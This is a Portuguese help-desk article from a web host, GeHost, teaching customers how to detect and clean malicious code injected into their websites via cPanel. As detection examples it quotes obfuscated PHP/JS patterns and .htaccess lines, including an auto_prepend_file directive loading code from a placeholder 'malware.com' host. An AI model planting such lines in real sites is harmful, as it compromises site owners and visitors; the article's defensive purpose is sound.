SSL & Segurança 7 visualizações

Como identificar se seu site foi invadido e injetado com código malicioso

Ver no WHMCS

Como identificar se seu site foi invadido e injetado com código malicioso

Olá, querido cliente da GeHost! 🌟

Seu site é como uma casa digital — protegido, acolhedor e cheio de conteúdo valioso. Mas, assim como qualquer casa, ele pode ser invadido. E, infelizmente, um dos riscos mais comuns é a injeção de código malicioso por hackers.

Não se assuste! Com um olhar atento e alguns passos simples, você consegue identificar se algo está errado. Vou te guiar com calma, como um verdadeiro Sensei da segurança digital. 💪🔐 ---

🔍 Como saber se seu site foi invadido?

Veja alguns sinais que podem indicar que seu site foi comprometido:
  • Seu site está lento ou travando sem motivo aparente.
  • Novas páginas ou links aparecem sem sua autorização.
  • Seus visitantes recebem avisos de segurança no navegador (como "Este site pode ser perigoso").
  • Seus e-mails profissionais começam a enviar mensagens estranhas ou spam.
  • Seu site redireciona para páginas desconhecidas ou de conteúdo duvidoso.
  • Conteúdo que você não escreveu aparece no seu site — como textos em outro idioma, anúncios ou códigos estranhos.
Se você notou algum desses sinais, pare tudo agora e siga os passos abaixo. ---

🛠️ Passo a passo: Como verificar se há código malicioso no seu site

Vamos usar o cPanel — o painel de controle da GeHost — para fazer uma inspeção rápida.
  1. Entre no cPanel do seu domínio:
  2. Use seu login e senha no painel painel.gehost.com.br.

    Tela de login do cPanel com campos de usuário e senha
  3. Abra o Gerenciador de Arquivos:
  4. No cPanel, clique em “Arquivos” e depois em “Gerenciador de Arquivos”.

    Tela do Gerenciador de Arquivos do cPanel com a árvore de pastas
  5. Navegue até a pasta pública:
  6. Na árvore de pastas, clique em public_html (ou o nome da sua pasta principal).

  7. Procure arquivos estranhos:
  8. Olhe com atenção por arquivos com nomes estranhos, como:

    • index.php com conteúdo diferente do seu.
    • Arquivos com nomes como 12345.php, temp.php, backup.php.
    • Arquivos com extensão .js ou .php que não são seus.

    Se encontrar algo assim, não abra — pode ser perigoso.

  9. Verifique o código-fonte de páginas do site:
  10. Abra uma página do seu site no navegador, clique com o botão direito e escolha “Exibir código-fonte”.

    Procure por trechos como:

    eval(base64_decode(...))

    document.write(unescape(...))

    Scripts que redirecionam automaticamente.

    Esses são sinais clássicos de injeção de código malicioso.

  11. Verifique arquivos de configuração:
  12. Procure por arquivos como .htaccess na pasta public_html. Ele pode estar sendo usado para redirecionamentos maliciosos.

    Abra o arquivo com o editor no cPanel e veja se há linhas como:

    Redirect 301 / http://site-perigoso.com

    php_value auto_prepend_file "http://malware.com/evil.php"

    Se encontrar, apague ou corrija imediatamente.

---

🛡️ O que fazer se seu site foi invadido?

Se você confirmou a presença de código malicioso, aqui está o que fazer:
  • Desative temporariamente seu site (via cPanel ou bloqueando o domínio no DNS) para evitar mais danos.
  • Reforce sua senha de cPanel e e-mail. Use uma senha forte (letras maiúsculas, minúsculas, números e símbolos).
  • Atualize todos os sistemas do seu site (WordPress, lojas virtuais, CMS).
  • Use um scanner de segurança (como o Wordfence, se for WordPress) para escanear todo o site.
  • Entre em contato com o suporte da GeHost — estamos aqui para ajudar! Envie o relato com detalhes e, se possível, o código suspeito.
---

💡 Dica do Sensei

Prevenir é melhor que remediar. Sempre:

  • Atualize seu site e plugins com frequência.
  • Não use senhas fáceis.
  • Evite instalar plugins ou temas de fontes duvidosas.
  • Faça backup regular (use o recurso Backup no cPanel).
---

📞 Precisa de ajuda?

Se tiver dúvidas, ou se precisar de apoio técnico, entre em contato com o suporte da GeHost — estamos aqui para te proteger.

Seu plano inclui 30 dias grátis de suporte após a entrega. Use esse tempo com sabedoria!

Com carinho,
Seu Sensei da Segurança
GeHost — Seu site, sua proteção

Precisa de Ajuda?

Nossa equipe está pronta para resolver suas dúvidas.